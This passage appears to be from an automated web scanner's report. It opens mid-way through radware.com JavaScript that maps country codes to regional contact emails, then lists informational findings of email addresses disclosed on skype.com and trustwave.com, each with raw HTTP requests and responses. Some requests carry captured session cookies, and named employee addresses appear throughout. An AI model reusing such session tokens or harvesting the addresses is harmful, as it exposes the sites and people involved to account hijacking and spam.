case "JM":
return "info@radware.com";
break;
case "MH":
return "info@radware.com";
break;
case "MQ":
return "info@radware.com";
break;
case "MX":
return "info@radware.com";
break;
case "NI":
return "info@radware.com";
break;
case "PA":
return "info@radware.com";
break;
case "PY":
return "info@radware.com";
break;
case "PE":
return "info@radware.com";
break;
case "SR":
return "info@radware.com";
break;
case "US":
return "info@radware.com";
break;
case "UY":
return "info@radware.com";
break;
case "VE":
return "info@radware.com";
break;
case "VI":
return "info@radware.com";
break;
case "SH":
return "info@radware.com";
break;
case "KN":
return "info@radware.com";
break;
case "LC":
return "info@radware.com";
break;
case "VC":
return "info@radware.com";
break;
case "TT":
return "info@radware.com";
break;
case "TC":
return "info@radware.com";
break;
case "UM":
return "info@radware.com";
break;
case "GS":
return "info@radware.com";
break;
case "BH":
return "info_me@radware.com";
break;
case "EG":
return "info_me@radware.com";
break;
        case "PS":
return "info_me@radware.com";
break;
case "FK":
return "info@radware.com";
break;
case "IR":
return "info_me@radware.com";
break;
case "IQ":
return "info_me@radware.com";
break;
case "JO":
return "info_me@radware.com";
break;
case "KI":
return "info@radware.com";
break;
case "KW":
return "info_me@radware.com";
break;
case "LB":
return "info_me@radware.com";
break;
case "LY":
return "info_me@radware.com";
break;
case "OM":
return "info_me@radware.com";
break;
case "QA":
return "info_me@radware.com";
break;
case "SA":
return "info_me@radware.com";
break;
case "SY":
return "info_me@radware.com";
break;
case "AE":
return "info_me@radware.com";
break;
case "YE":
return "info_me@radware.com";
break;

// radware-info-australia
case "AU":
return "info_australia@radware.com";
break;
case "CX":
return "info_australia@radware.com";
break;
case "CC":
return "info_australia@radware.com";
break;
case "CK":
return "info_australia@radware.com";
break;
case "FJ":
return "info_australia@radware.com";
break;
case "HM":
return "info_australia@radware.com";
break;
case "NR":
return "info_australia@radware.com";
break;
case "NZ":
return "info_australia@radware.com";
break;
case "NU":
return "info_australia@radware.com";
break;
case "NF":
return "info_australia@radware.com";
break;
case "WS":
return "info_australia@radware.com";
break;
case "VU":
return "info_australia@radware.com";
break;
case "TK":
return "info_australia@radware.com";
break;
case "PG":
return "info_australia@radware.com";
break;
case "SB":
return "info_australia@radware.com";
break;
case "PN":
return "info_australia@radware.com";
break;
case "TV":
return "info_australia@radware.com";
break;
case "PW":
return "info_australia@radware.com";
break;
case "TO":
return "info_australia@radware.com";
break;
case "IO":
return "info_australia@radware.com";
break;
case "MP":
return "info_australia@radware.com";
break;

// radware-info-china
case "CN":
return "info_cn@radware.com";
break;
case "KH":
return "info_cn@radware.com";
break;
case "GD":
return "info_cn@radware.com";
break;
case "MN":
return "info_cn@radware.com";
break;
case "MM":
return "info_cn@radware.com";
break;
case "TP":
return "info_cn@radware.com";
break;
case "BN":
return "info_cn@radware.com";
break;

// radware-info-hongkong
case "HK":
return "info_hongkong@radware.com";
break;
case "MO":
return "info_hongkong@radware.com";
break;

// radware-info-taiwan
case "TW":
return "info_taiwan@radware.com";
break;

// radware-info-india
case "BD":
return "info_india@radware.com";
break;
case "BT":
return "info_india@radware.com";
break;
case "DM":
return "info_india@radware.com";
break;
case "IN":
return "info_india@radware.com";
break;
case "MV":
return "info_india@radware.com";
break;
case "FM":
return "info_india@radware.com";
break;
case "MS":
return "info_india@radware.com";
break;
case "NP":
return "info_india@radware.com";
break;
case "PK":
return "info_india@radware.com";
break;
case "LK":
return "info_india@radware.com";
break;

// radware-info-japan
case "JP":
return "info_japan@radware.com";
break;

// radware-info-korea
case "KP":
return "info_kr@radware.com";
break;
case "KR":
return "info_kr@radware.com";
break;

// radware-info-singapore
case "ID":
return "info_sg@radware.com";
break;
case "MY":
return "info_sg@radware.com";
break;
case "SG":
return "info_sg@radware.com";
break;

// radware-info-vietnam
case "Lao People's Democratic Republic":
return "info_vn@radware.com";
break;
case "PH":
return "info_vn@radware.com";
break;
case "VN":
return "info_vn@radware.com";
break;

// radware-info-thailand
case "TH":
return "info_th@radware.com";
break;

// radware-info-austria
case "AT":
return "info_at@radware.com";
break;
case "LI":
return "info_at@radware.com";
break;
case "CH":
return "info_de@radware.com";
break;

// radware-info-germany
case "DE":
return "info_de@radware.com";
break;
case "HU":
return "info_cee@radware.com";
break;

// radware-info-belgium
case "BE":
return "info_benelux@radware.com";
break;
case "LU":
return "info_benelux@radware.com";
break;

// radware-info-cee
case "AZ":
return "info_cee@radware.com";
break;
case "BY":
return "info_cis@radware.com";
break;
case "EE":
return "info_cis@radware.com";
break;
case "GE":
return "info_cis@radware.com";
break;
case "KZ":
return "info_cis@radware.com";
break;
case "KG":
return "info_cee@radware.com";
break;
case "LV":
return "info_cis@radware.com";
break;
case "LT":
return "info_cis@radware.com";
break;
case "RU":
return "info_cis@radware.com";
break;
case "TJ":
return "info_cis@radware.com";
break;
case "TM":
return "info_cee@radware.com";
break;
case "UA":
return "info_cis@radware.com";
break;
case "UZ":
return "info_cis@radware.com";
break;

// radware-info-cyprus-greece
case "CY":
return "info_cyprus_greece@radware.com";
break;
case "GR":
return "info_cyprus_greece@radware.com";
break;

// radware-info-sc-europe
case "AL":
return "info_sc-europe@radware.com";
break;
case "AM":
return "info_sc-europe@radware.com";
break;
case "BA":
return "info_sc-europe@radware.com";
break;
case "BG":
return "info_sc-europe@radware.com";
break;
case "HR":
return "info_sc-europe@radware.com";
break;
case "CZ":
return "info_cee@radware.com";
break;
case "MK":
return "info_sc-europe@radware.com";
break;
case "MT":
return "info_sc-europe@radware.com";
break;
case "MD":
return "info_sc-europe@radware.com";
break;
case "PL":
return "info_cee@radware.com";
break;
case "RO":
return "info_sc-europe@radware.com";
break;
case "SM":
return "info_sc-europe@radware.com";
break;

case "CS":
return "info_sc-europe@radware.com";
break;
case "SK":
return "info_cee@radware.com";
break;
case "SI":
return "info_sc-europe@radware.com";
break;
case "TR":
return "info_sc-europe@radware.com";
break;
case "YU":
return "info_sc-europe@radware.com";
break;

// radware-info-iberia
case "AD":
return "info_iberia@radware.com";
break;
case "PT":
return "info_iberia@radware.com";
break;
case "ES":
return "info_iberia@radware.com";
break;

// radware-info-france
case "DZ":
return "info_fr@radware.com";
break;
case "FR":
return "info_fr@radware.com";
break;
case "PF":
return "info_fr@radware.com";
break;
case "TF":
return "info_fr@radware.com";
break;
case "GP":
return "info_fr@radware.com";
break;
case "MG":
return "info_fr@radware.com";
break;
case "YT":
return "info_fr@radware.com";
break;
case "MC":
return "info_fr@radware.com";
break;
case "MA":
return "info_fr@radware.com";
break;
case "NC":
return "info_fr@radware.com";
break;
case "RE":
return "info_fr@radware.com";
break;
case "PM":
return "info_fr@radware.com";
break;
case "TN":
return "info_fr@radware.com";
break;
case "WF":
return "info_fr@radware.com";
break;
case "EH":
return "info_fr@radware.com";
break;
case "SN":
return "info_fr@radware.com";
break;
case "MQ":
return "info_fr@radware.com";
break;
case "GY":
return "info_fr@radware.com";
break;

// radware-info-israel
case "IL":
return "info_il@radware.com";
break;

// radware-info-italy
case "IT":
return "info_it@radware.com";
break;

// radware-info-netherlands
case "NL":
return "info_benelux@radware.com";
break;

// radware-info-rest-emea
case "AF":
return "info_rest_europe@radware.com";
break;
case "BJ":
return "info_rest_europe@radware.com";
break;
case "BF":
return "info_rest_europe@radware.com";
break;
case "BI":
return "info_rest_europe@radware.com";
break;
case "CM":
return "info_rest_europe@radware.com";
break;
case "CV":
return "info_rest_europe@radware.com";
break;
case "CF":
return "info_rest_europe@radware.com";
break;
case "TD":
return "info_rest_europe@radware.com";
break;
case "CG":
return "info_rest_europe@radware.com";
break;
case "CD":
return "info_rest_europe@radware.com";
break;
case "CI":
return "info_rest_europe@radware.com";
break;
case "DJ":
return "info_rest_europe@radware.com";
break;
case "GQ":
return "info_rest_europe@radware.com";
break;
case "ER":
return "info_rest_europe@radware.com";
break;
case "ET":
return "info_rest_europe@radware.com";
break;
case "GA":
return "info_rest_europe@radware.com";
break;
case "GM":
return "info_rest_europe@radware.com";
break;
case "GN":
return "info_rest_europe@radware.com";
break;
case "GW":
return "info_rest_europe@radware.com";
break;
case "LR":

return "info_rest_europe@radware.com";
break;
case "ML":
return "info_rest_europe@radware.com";
break;
case "MR":
return "info_rest_europe@radware.com";
break;

// radware-info-scandinavia
case "DK":
return "info_scandi@radware.com";
break;
case "FI":
return "info_scandi@radware.com";
break;
case "GL":
return "info_scandi@radware.com";
break;
case "IS":
return "info_scandi@radware.com";
break;
case "NO":
return "info_scandi@radware.com";
break;
case "SE":
return "info_scandi@radware.com";
break;

// radware-info-southafrica
case "AO":
return "info_za@radware.com";
break;
case "BW":
return "info_za@radware.com";
break;
case "KM":
return "info_za@radware.com";
break;
case "GH":
return "info_za@radware.com";
break;
case "KE":
return "info_za@radware.com";
break;
case "LS":
return "info_za@radware.com";
break;
case "MW":
return "info_za@radware.com";
break;
case "MU":
return "info_za@radware.com";
break;
case "MZ":
return "info_za@radware.com";
break;
case "NA":
return "info_za@radware.com";
break;
case "NE":
return "info_za@radware.com";
break;
case "NG":
return "info_za@radware.com";
break;
case "RW":
return "info_za@radware.com";
break;
case "ST":
return "info_za@radware.com";
break;
case "SC":
return "info_za@radware.com";
break;
case "SL":
return "info_za@radware.com";
break;
case "SO":
return "info_za@radware.com";
break;
case "ZA":
return "info_za@radware.com";
break;
case "SD":
return "info_za@radware.com";
break;
case "SZ":
return "info_za@radware.com";
break;
case "TZ":
return "info_za@radware.com";
break;
case "TG":
return "info_za@radware.com";
break;
case "UG":
return "info_za@radware.com";
break;
case "ZR":
return "info_za@radware.com";
break;
case "ZM":
return "info_za@radware.com";
break;
case "ZW":
return "info_za@radware.com";
break;

// radware-info-uk
case "FO":
return "info_uk@radware.com";
break;
case "IE":
return "info_uk@radware.com";
break;
case "GB":
return "info_uk@radware.com";
break;
case "UK":
return "info_uk@radware.com";
break;
default :
return "webmaster@radware.com";
}
}
function getmailRegion(countrycode)
{
   //var AmericaEmails = 'Dave.Chmielewski@radware.com; susan.peter@Radware.com'
   // var AmericaEmails = 'nchipko@murraymedia.com; dherrmann@murraymedia.com; mkinner@murraymedia.com'
//    var EMEAEmails = 'AlainL@radware.com; AlexandreB@radware.com'
// var APACEmails = 'EdmundW@radware.com; TerenceY@radware.com'
//Script for Channel Partner Request form distribution list
switch (countrycode){
case "PR":
return "info@radware.com";
break;
case "AS":
return "info@radware.com";
break;
case "AI":
return "info@radware.com";
break;
case "AQ":
return "info@radware.com";
break;
case "AG":
return "info@radware.com";
break;
case "AR":
return "info@radware.com";
break;
case "AW":
return "info@radware.com";
break;
case "BS":
return "info@radware.com";
break;
case "BB":
return "info@radware.com";
break;
case "BZ":
return "info@radware.com";
break;
case "BM":
return "info@radware.com";
break;
case "BO":
return "info@radware.com";
break;
case "BR":
return "info@radware.com";
break;
case "CA":
return "info@radware.com";
break;
case "KY":
return "info@radware.com";
break;
case "CL":
return "info@radware.com";
break;
case "CO":
return "info@radware.com";
break;
case "CR":
return "info@radware.com";
break;
case "CU":
return "info@radware.com";
break;
case "DO":
return "info@radware.com";
break;
case "EC":
return "info@radware.com";
break;
case "SV":
return "info@radware.com";
break;
case "GF":
return "info@radware.com";
break;
case "GU":
return "info@radware.com";
break;
case "GT":
return "info@radware.com";
break;
case "GY":
return "info@radware.com";
break;
case "HT":
return "info@radware.com";
break;
case "HN":
return "info@radware.com";
break;
case "JM":
return "info@radware.com";
break;
case "MH":
return "info@radware.com";
break;
case "MQ":
return "info@radware.com";
break;
case "MX":
return "info@radware.com";
break;
case "NI":
return "info@radware.com";
break;
case "PA":
return "info@radware.com";
break;
case "PY":
return "info@radware.com";
break;
case "PE":
return "info@radware.com";
break;
case "SR":
return "info@radware.com";
break;
case "US":
return "info@radware.com";
break;
case "UY":
return "info@radware.com";
break;
case "VE":
return "info@radware.com";
break;
case "VI":
return "info@radware.com";
break;
case "SH":
return "info@radware.com";
break;
case "KN":
return "info@radware.com";
break;
case "LC":
return "info@radware.com";
break;
case "VC":
return "info@radware.com";
break;
case "TT":
return "info@radware.com";
break;
case "TC":
return "info@radware.com";
break;
case "UM":
return "info@radware.com";
break;
case "GS":
return "info@radware.com";
break;
case "BH":
return "info@radware.com";
break;
case "EG":
return "info_me@radware.com";
break;
        case "PS":
return "info_me@radware.com";
break;
case "FK":
return "info@radware.com";
break;
case "IR":
return "info_me@radware.com";
break;
case "IQ":
return "info_me@radware.com";
break;
case "JO":
return "info_me@radware.com";
break;
case "KI":
return "info@radware.com";
break;
case "KW":
return "info_me@radware.com";
break;
case "LB":
return "info_me@radware.com";
break;
case "LY":
return "info_me@radware.com";
break;
case "OM":
return "info_me@radware.com";
break;
case "QA":
return "info_me@radware.com";
break;
case "SA":
return "info_me@radware.com";
break;
case "SY":
return "info_me@radware.com";
break;
case "AE":
return "info_me@radware.com";
break;
case "YE":
return "info_me@radware.com";
break;

// radware-info-australia
case "AU":
return "info_australia@radware.com";
break;
case "CX":
return "info_australia@radware.com";
break;
case "CC":
return "info_australia@radware.com";
break;
case "CK":
return "info_australia@radware.com";
break;
case "FJ":
return "info_australia@radware.com";
break;
case "HM":
return "info_australia@radware.com";
break;
case "NR":
return "info_australia@radware.com";
break;
case "NZ":
return "info_australia@radware.com";
break;
case "NU":
return "info_australia@radware.com";
break;
case "NF":
return "info_australia@radware.com";
break;
case "WS":
return "info_australia@radware.com";
break;
case "VU":
return "info_australia@radware.com";
break;
case "TK":
return "info_australia@radware.com";
break;
case "PG":
return "info_australia@radware.com";
break;
case "SB":
return "info_australia@radware.com";
break;
case "PN":
return "info_australia@radware.com";
break;
case "TV":
return "info_australia@radware.com";
break;
case "PW":
return "info_australia@radware.com";
break;
case "TO":
return "info_australia@radware.com";
break;
case "IO":
return "info_australia@radware.com";
break;
case "MP":
return "info_australia@radware.com";
break;

// radware-info-china
case "CN":
return "info_cn@radware.com";
break;
case "KH":
return "info_cn@radware.com";
break;
case "GD":
return "info_cn@radware.com";
break;
case "MN":
return "info_cn@radware.com";
break;
case "MM":
return "info_cn@radware.com";
break;
case "TP":
return "info_cn@radware.com";
break;
case "BN":
return "info_cn@radware.com";
break;

// radware-info-hongkong
case "HK":
return "info_hongkong@radware.com";
break;
case "MO":
return "info_hongkong@radware.com";
break;

// radware-info-taiwan
case "TW":
return "info_taiwan@radware.com";
break;

// radware-info-india
case "BD":
return "info_india@radware.com";
break;
case "BT":
return "info_india@radware.com";
break;
case "DM":
return "info_india@radware.com";
break;
case "IN":
return "info_india@radware.com";
break;
case "MV":
return "info_india@radware.com";
break;
case "FM":
return "info_india@radware.com";
break;
case "MS":
return "info_india@radware.com";
break;
case "NP":
return "info_india@radware.com";
break;
case "PK":
return "info_india@radware.com";
break;
case "LK":
return "info_india@radware.com";
break;

// radware-info-japan
case "JP":
return "info_japan@radware.com";
break;

// radware-info-korea
case "KP":
return "info_kr@radware.com";
break;
case "KR":
return "info_kr@radware.com";
break;

// radware-info-singapore
case "ID":
return "info_sg@radware.com";
break;
case "MY":
return "info_sg@radware.com";
break;
case "SG":
return "info_sg@radware.com";
break;

// radware-info-vietnam
case "LA":
return "info_vn@radware.com";
break;
case "PH":
return "info_vn@radware.com";
break;
case "VN":
return "info_vn@radware.com";
break;

// radware-info-thailand
case "TH":
return "info_th@radware.com";
break;

// radware-info-austria
case "AT":
return "info_at@radware.com";
break;
case "LI":
return "info_at@radware.com";
break;
case "CH":
return "info_de@radware.com";
break;

// radware-info-germany
case "DE":
return "info_de@radware.com";
break;
case "HU":
return "info_cee@radware.com";
break;

// radware-info-belgium
case "BE":
return "info_belux@radware.com";
break;
case "LU":
return "info_belux@radware.com";
break;

// radware-info-cee
case "AZ":
return "info_cee@radware.com";
break;
case "BY":
return "info_cis@radware.com";
break;
case "EE":
return "info_cis@radware.com";
break;
case "GE":
return "info_cis@radware.com";
break;
case "KZ":
return "info_cis@radware.com";
break;
case "KG":
return "info_cee@radware.com";
break;
case "LV":
return "info_cis@radware.com";
break;
case "LT":
return "info_cis@radware.com";
break;
case "RU":
return "info_cis@radware.com";
break;
case "TJ":
return "info_cis@radware.com";
break;
case "TM":
return "info_cee@radware.com";
break;
case "UA":
return "info_cis@radware.com";
break;
case "UZ":
return "info_cis@radware.com";
break;

// radware-info-cyprus-greece
case "CY":
return "info_cyprus_greece@radware.com";
break;
case "GR":
return "info_cyprus_greece@radware.com";
break;

// radware-info-sc-europe
case "AL":
return "info_sc-europe@radware.com";
break;
case "AM":
return "info_sc-europe@radware.com";
break;
case "BA":
return "info_sc-europe@radware.com";
break;
case "BG":
return "info_sc-europe@radware.com";
break;
case "HR":
return "info_sc-europe@radware.com";
break;
case "CZ":
return "info_cee@radware.com";
break;
case "MK":
return "info_sc-europe@radware.com";
break;
case "MT":
return "info_sc-europe@radware.com";
break;
case "MD":
return "info_sc-europe@radware.com";
break;
case "PL":
return "info_cee@radware.com";
break;
case "RO":
return "info_sc-europe@radware.com";
break;
case "SM":
return "info_sc-europe@radware.com";
break;
case "CS":
return "info_sc-europe@radware.com";
break;
case "SK":
return "info_cee@radware.com";
break;
case "SI":
return "info_sc-europe@radware.com";

break;
case "TR":
return "info_sc-europe@radware.com";
break;
case "YU":
return "info_sc-europe@radware.com";
break;

// radware-info-iberia
case "AD":
return "info_iberia@radware.com";
break;
case "PT":
return "info_iberia@radware.com";
break;
case "ES":
return "info_iberia@radware.com";
break;

// radware-info-france
case "DZ":
return "info_fr@radware.com";
break;
case "FR":
return "info_fr@radware.com";
break;
case "PF":
return "info_fr@radware.com";
break;
case "TF":
return "info_fr@radware.com";
break;
case "GP":
return "info_fr@radware.com";
break;
case "MG":
return "info_fr@radware.com";
break;
case "YT":
return "info_fr@radware.com";
break;
case "MC":
return "info_fr@radware.com";
break;
case "MA":
return "info_fr@radware.com";
break;
case "NC":
return "info_fr@radware.com";
break;
case "RE":
return "info_fr@radware.com";
break;
case "PM":
return "info_fr@radware.com";
break;
case "TN":
return "info_fr@radware.com";
break;
case "WF":
return "info_fr@radware.com";
break;
case "EH":
return "info_fr@radware.com";
break;
case "SN":
return "info_fr@radware.com";
break;
case "MQ":
return "info_fr@radware.com";
break;
case "GY":
return "info_fr@radware.com";
break;

// radware-info-israel
case "IL":
return "info_il@radware.com";
break;

// radware-info-italy
case "IT":
return "info_it@radware.com";
break;

// radware-info-netherlands
case "NL":
return "info_nl@radware.com";
break;

// radware-info-rest-emea
case "AF":
return "info_rest_europe@radware.com";
break;
case "BJ":
return "info_rest_europe@radware.com";
break;
case "BF":
return "info_rest_europe@radware.com";
break;
case "BI":
return "info_rest_europe@radware.com";
break;
case "CM":
return "info_rest_europe@radware.com";
break;
case "CV":
return "info_rest_europe@radware.com";
break;
case "CF":
return "info_rest_europe@radware.com";
break;
case "TD":
return "info_rest_europe@radware.com";
break;
case "CG":
return "info_rest_europe@radware.com";
break;
case "CD":
return "info_rest_europe@radware.com";
break;
case "CI":
return "info_rest_europe@radware.com";
break;
case "DJ":
return "info_rest_europe@radware.com";
break;
case "GQ":
return "info_rest_europe@radware.com";
break;
case "ER":
return "info_rest_europe@radware.com";
break;
case "ET":
return "info_rest_europe@radware.com";
break;
case "GA":
return "info_rest_europe@radware.com";
break;
case "GM":
return "info_rest_europe@radware.com";
break;
case "GN":
return "info_rest_europe@radware.com";
break;
case "GW":
return "info_rest_europe@radware.com";
break;
case "LR":
return "info_rest_europe@radware.com";
break;
case "ML":
return "info_rest_europe@radware.com";
break;
case "MR":
return "info_rest_europe@radware.com";
break;

// radware-info-scandinavia
case "DK":
return "info_scandi@radware.com";
break;
case "FI":
return "info_scandi@radware.com";
break;
case "GL":
return "info_scandi@radware.com";
break;
case "IS":
return "info_scandi@radware.com";
break;
case "NO":
return "info_scandi@radware.com";
break;
case "SE":
return "info_scandi@radware.com";
break;

// radware-info-southafrica
case "AO":
return "info_za@radware.com";
break;
case "BW":
return "info_za@radware.com";
break;
case "KM":
return "info_za@radware.com";
break;
case "GH":
return "info_za@radware.com";
break;
case "KE":
return "info_za@radware.com";
break;
case "LS":
return "info_za@radware.com";
break;
case "MW":
return "info_za@radware.com";
break;
case "MU":
return "info_za@radware.com";
break;
case "MZ":
return "info_za@radware.com";
break;
case "NA":
return "info_za@radware.com";
break;
case "NE":
return "info_za@radware.com";
break;
case "NG":
return "info_za@radware.com";
break;
case "RW":
return "info_za@radware.com";
break;
case "ST":
return "info_za@radware.com";
break;
case "SC":
return "info_za@radware.com";
break;
case "SL":
return "info_za@radware.com";
break;
case "SO":
return "info_za@radware.com";
break;
case "ZA":
return "info_za@radware.com";
break;
case "SD":
return "info_za@radware.com";
break;
case "SZ":
return "info_za@radware.com";
break;
case "TZ":
return "info_za@radware.com";
break;
case "TG":
return "info_za@radware.com";
break;
case "UG":
return "info_za@radware.com";
break;
case "ZR":
return "info_za@radware.com";
break;
case "ZM":
return "info_za@radware.com";
break;
case "ZW":
return "info_za@radware.com";
break;

// radware-info-uk
case "FO":
return "info_uk@radware.com";
break;
case "IE":
return "info_uk@radware.com";
break;
case "GB":
return "info_uk@radware.com";
break;
case "UK":
return "info_uk@radware.com";
break;
default :
return "webmaster@radware.com";
}
}

$ektron.extend({
           htmlEncodeText: function(text) {
               documen.getElementById("hiddentext").innerHTML = text;
           }
});


20.115. http://www.skype.com/i/js/skype-common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /i/js/skype-common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /i/js/skype-common.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://search2.skype.com/search/search.cgi?query=xss&collection=skype-en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.skype.com
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:00:35 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 37111
Content-Type: application/javascript
Content-Language: en

/**
* Copyright (c) 2009-2010, Skype Technologies S.A. All rights reserved.
* Originally partly based on YUI library (http://developer.yahoo.com/yui/),
* also some techniques from jQuery library (h
...[SNIP]...
<martin.kapp@skype.net>
...[SNIP]...

20.116. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/skype-wifi

Issue detail

The following email address was disclosed in the response:

Request

GET /intl/en-us/features/allfeatures/skype-wifi HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:28 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 60142


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype WiFi - Wireless Internet Access from WiFi Hotspots - Skype</title>
   <meta name="de
...[SNIP]...
<a href="mailto:addhotspot@skype.com">addhotspot@skype.com</a>
...[SNIP]...

20.117. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/skype-wifi/

Issue detail

The following email address was disclosed in the response:

Request

GET /intl/en-us/features/allfeatures/skype-wifi/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:37 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 60142


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype WiFi - Wireless Internet Access from WiFi Hotspots - Skype</title>
   <meta name="de
...[SNIP]...
<a href="mailto:addhotspot@skype.com">addhotspot@skype.com</a>
...[SNIP]...

20.118. http://www.skype.com/intl/en/features/allfeatures/skype-wifi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/skype-wifi

Issue detail

The following email address was disclosed in the response:

Request

GET /intl/en/features/allfeatures/skype-wifi HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 60268


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype WiFi - Wireless Internet Access from WiFi Hotspots - Skype</title>
   <meta name="descr
...[SNIP]...
<a href="mailto:addhotspot@skype.com">addhotspot@skype.com</a>
...[SNIP]...

20.119. http://www.skype.com/intl/en/features/allfeatures/skype-wifi/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/skype-wifi/

Issue detail

The following email address was disclosed in the response:

Request

GET /intl/en/features/allfeatures/skype-wifi/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:50 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 60268


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype WiFi - Wireless Internet Access from WiFi Hotspots - Skype</title>
   <meta name="descr
...[SNIP]...
<a href="mailto:addhotspot@skype.com">addhotspot@skype.com</a>
...[SNIP]...

20.120. http://www.skypeassets.com/i/js/skype-common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skypeassets.com
Path:   /i/js/skype-common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /i/js/skype-common.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://heartbeat.skype.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.skypeassets.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 37111
Content-Type: application/javascript
Content-Language: en
Cache-Control: max-age=10800
Date: Sun, 04 Sep 2011 21:04:06 GMT
Connection: close
Vary: Accept-Encoding

/**
* Copyright (c) 2009-2010, Skype Technologies S.A. All rights reserved.
* Originally partly based on YUI library (http://developer.yahoo.com/yui/),
* also some techniques from jQuery library (h
...[SNIP]...
<martin.kapp@skype.net>
...[SNIP]...

20.121. https://www.trustwave.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustwave.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.trustwave.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3f8jad7n25ekrcbukulr2hcf12

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:20:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Information Security | Complianc
...[SNIP]...
<a onclick="pageTracker._trackEvent('Footer', 'Email', 'mailto:info@trustwave.com')" href="mailto:info@trustwave.com">info@trustwave.com</a>
...[SNIP]...
<a onclick="pageTracker._trackEvent('Footer', 'Email', 'mailto:ir@trustwave.com')" href="mailto:ir@trustwave.com">
...[SNIP]...

20.122. https://www.trustwave.com/js/jquery/hoverIntent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustwave.com
Path:   /js/jquery/hoverIntent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery/hoverIntent.js?v=012911 HTTP/1.1
Host: www.trustwave.com
Connection: keep-alive
Referer: https://www.trustwave.com/web-application-firewall/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
